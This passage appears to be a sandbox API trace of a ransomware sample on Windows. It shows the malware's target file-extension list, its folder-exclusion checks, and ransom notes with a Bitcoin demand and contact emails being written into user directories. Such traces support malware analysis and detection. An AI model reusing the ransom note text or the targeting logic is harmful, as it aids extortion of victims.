tn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".regtrans-ms") returned 0x0
	[0179.436] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1
	[0179.437] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d599f22, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1
	[0179.437] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d599f22, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1
	[0179.437] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1
	[0179.437] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d599f22, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SendTo", cAlternateFileName="")) returned 1
	[0179.437] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d599f22, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1
	[0179.437] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d599f22, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1
	[0179.437] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1
	[0179.437] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 0
	[0179.437] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0179.438] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0179.453] lstrcpyW (in: lpString1=0x18d1b4, lpString2="C:\\Users\\Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default"
	[0179.453] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\*.*") returned="C:\\Users\\Default\\*.*"
	[0179.455] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0179.455] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0179.455] wsprintfW (in: param_1=0x18caa0, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\Default\\HELP_DECRYPT_YOUR_FILES.TXT") returned 44
	[0179.455] CreateFileW (lpFileName="C:\\Users\\Default\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\default\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x37c
	[0179.456] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0179.456] WriteFile (in: hFile=0x37c, lpBuffer=0x18be58*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18cd7c, lpOverlapped=0x0 | out: lpBuffer=0x18be58*, lpNumberOfBytesWritten=0x18cd7c*=0xc46, lpOverlapped=0x0) returned 1
	[0179.459] CloseHandle (hObject=0x37c) returned 1
	[0179.459] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18be28, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18be28*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0179.459] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0179.460] GetUserNameA (in: lpBuffer=0x18bd0c, pcbBuffer=0x18be24 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18be24) returned 1
	[0179.461] wsprintfW (in: param_1=0x18cca8, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0179.461] CreateFileW (lpFileName="C:\\Users\\Default\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\default\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x37c
	[0179.461] SetFilePointer (in: hFile=0x37c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0179.461] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0179.461] WriteFile (in: hFile=0x37c, lpBuffer=0x18cca8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18cd84, lpOverlapped=0x0 | out: lpBuffer=0x18cca8*, lpNumberOfBytesWritten=0x18cd84*=0x30, lpOverlapped=0x0) returned 1
	[0179.462] CloseHandle (hObject=0x37c) returned 1
	[0179.462] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0179.462] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0179.462] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0179.462] wsprintfW (in: param_1=0x18ca60, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\Default\\HELP_DECRYPT_YOUR_FILES.HTML") returned 45
	[0179.462] CreateFileW (lpFileName="C:\\Users\\Default\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\default\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x37c
	[0179.463] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0179.463] WriteFile (in: hFile=0x37c, lpBuffer=0x18c254*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18cd78, lpOverlapped=0x0 | out: lpBuffer=0x18c254*, lpNumberOfBytesWritten=0x18cd78*=0x808, lpOverlapped=0x0) returned 1
	[0179.466] CloseHandle (hObject=0x37c) returned 1
	[0179.466] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0179.466] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18c23c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18c23c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0179.467] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0179.467] GetUserNameA (in: lpBuffer=0x18c120, pcbBuffer=0x18c238 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18c238) returned 1
	[0179.468] wsprintfA (in: param_1=0x18cc68, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0179.468] CreateFileW (lpFileName="C:\\Users\\Default\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\default\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x37c
	[0179.468] SetFilePointer (in: hFile=0x37c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0179.469] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0179.469] WriteFile (in: hFile=0x37c, lpBuffer=0x18cc68*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18cd80, lpOverlapped=0x0 | out: lpBuffer=0x18cc68*, lpNumberOfBytesWritten=0x18cd80*=0x43, lpOverlapped=0x0) returned 1
	[0179.470] CloseHandle (hObject=0x37c) returned 1
	[0179.470] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\*.*" (normalized: "c:\\users\\default\\*.*"), lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x8475c2af, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x847f4e3c, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0179.470] lstrlenW (lpString="C:\\Users\\Default\\*.*") returned 20
	[0179.470] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0179.471] CharLowerBuffW (in: lpsz="C:\\Users\\Default\\*.*", cchLength=0x14 | out: lpsz="c:\\users\\default\\*.*") returned 0x14
	[0179.471] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.471] StrStrW (lpFirst="c:\\users\\default\\*.*", lpSrch="windows") returned 0x0
	[0179.471] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.471] StrStrW (lpFirst="c:\\users\\default\\*.*", lpSrch="boot") returned 0x0
	[0179.471] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.471] StrStrW (lpFirst="c:\\users\\default\\*.*", lpSrch="system volume information") returned 0x0
	[0179.472] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.472] StrStrW (lpFirst="c:\\users\\default\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0179.472] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.472] StrStrW (lpFirst="c:\\users\\default\\*.*", lpSrch="temp") returned 0x0
	[0179.472] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.472] StrStrW (lpFirst="c:\\users\\default\\*.*", lpSrch="program files") returned 0x0
	[0179.472] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.472] StrStrW (lpFirst="c:\\users\\default\\*.*", lpSrch="program files (x86)") returned 0x0
	[0179.473] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.473] StrStrW (lpFirst="c:\\users\\default\\*.*", lpSrch="appdata") returned 0x0
	[0179.473] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.473] StrStrW (lpFirst="c:\\users\\default\\*.*", lpSrch="application data") returned 0x0
	[0179.473] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.473] StrStrW (lpFirst="c:\\users\\default\\*.*", lpSrch="winnt") returned 0x0
	[0179.473] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.474] StrStrW (lpFirst="c:\\users\\default\\*.*", lpSrch="tmp") returned 0x0
	[0179.474] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.474] StrStrW (lpFirst="c:\\users\\default\\*.*", lpSrch="cache") returned 0x0
	[0179.474] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.474] StrStrW (lpFirst="c:\\users\\default\\*.*", lpSrch="temporary internet files") returned 0x0
	[0179.474] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.474] StrStrW (lpFirst="c:\\users\\default\\*.*", lpSrch="webcache") returned 0x0
	[0179.474] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.475] StrStrW (lpFirst="c:\\users\\default\\*.*", lpSrch="inetcache") returned 0x0
	[0179.475] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.475] StrStrW (lpFirst="c:\\users\\default\\*.*", lpSrch="nvidia") returned 0x0
	[0179.475] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.475] StrStrW (lpFirst="c:\\users\\default\\*.*", lpSrch="packages") returned 0x0
	[0179.475] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.475] StrStrW (lpFirst="c:\\users\\default\\*.*", lpSrch="cookies") returned 0x0
	[0179.475] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.476] StrStrW (lpFirst="c:\\users\\default\\*.*", lpSrch="programdata") returned 0x0
	[0179.476] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0179.476] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0179.476] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x8475c2af, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x847f4e3c, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0179.476] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0179.476] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1
	[0179.476] lstrcmpW (lpString1="AppData", lpString2="..") returned 1
	[0179.476] lstrcmpW (lpString1="AppData", lpString2=".") returned 1
	[0179.477] lstrcpyW (in: lpString1=0x18cfac, lpString2="C:\\Users\\Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default"
	[0179.477] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\"
	[0179.477] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="AppData" | out: lpString1="C:\\Users\\Default\\AppData") returned="C:\\Users\\Default\\AppData"
	[0179.477] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\Default\\AppData" | out: lpString1="C:\\Users\\Default\\AppData") returned="C:\\Users\\Default\\AppData"
	[0179.477] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData", lpString2="\\" | out: lpString1="C:\\Users\\Default\\AppData\\") returned="C:\\Users\\Default\\AppData\\"
	[0179.477] lstrcpyW (in: lpString1=0x18c094, lpString2="C:\\Users\\Default\\AppData\\" | out: lpString1="C:\\Users\\Default\\AppData\\") returned="C:\\Users\\Default\\AppData\\"
	[0179.477] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\AppData\\*.*") returned="C:\\Users\\Default\\AppData\\*.*"
	[0179.477] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\*.*" (normalized: "c:\\users\\default\\appdata\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0179.478] lstrlenW (lpString="C:\\Users\\Default\\AppData\\*.*") returned 28
	[0179.478] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0179.478] CharLowerBuffW (in: lpsz="C:\\Users\\Default\\AppData\\*.*", cchLength=0x1c | out: lpsz="c:\\users\\default\\appdata\\*.*") returned 0x1c
	[0179.478] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.478] StrStrW (lpFirst="c:\\users\\default\\appdata\\*.*", lpSrch="windows") returned 0x0
	[0179.478] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.479] StrStrW (lpFirst="c:\\users\\default\\appdata\\*.*", lpSrch="boot") returned 0x0
	[0179.479] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.479] StrStrW (lpFirst="c:\\users\\default\\appdata\\*.*", lpSrch="system volume information") returned 0x0
	[0179.479] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.479] StrStrW (lpFirst="c:\\users\\default\\appdata\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0179.479] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.479] StrStrW (lpFirst="c:\\users\\default\\appdata\\*.*", lpSrch="temp") returned 0x0
	[0179.480] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.480] StrStrW (lpFirst="c:\\users\\default\\appdata\\*.*", lpSrch="program files") returned 0x0
	[0179.480] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.480] StrStrW (lpFirst="c:\\users\\default\\appdata\\*.*", lpSrch="program files (x86)") returned 0x0
	[0179.480] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.480] StrStrW (lpFirst="c:\\users\\default\\appdata\\*.*", lpSrch="appdata") returned="appdata\\*.*"
	[0179.480] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0179.480] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\Default\\AppData" | out: lpString1="C:\\Users\\Default\\AppData") returned="C:\\Users\\Default\\AppData"
	[0179.481] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\AppData\\*.*") returned="C:\\Users\\Default\\AppData\\*.*"
	[0179.481] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0179.481] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0179.481] wsprintfW (in: param_1=0x18bd90, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\Default\\AppData\\HELP_DECRYPT_YOUR_FILES.TXT") returned 52
	[0179.481] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\default\\appdata\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0179.482] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better 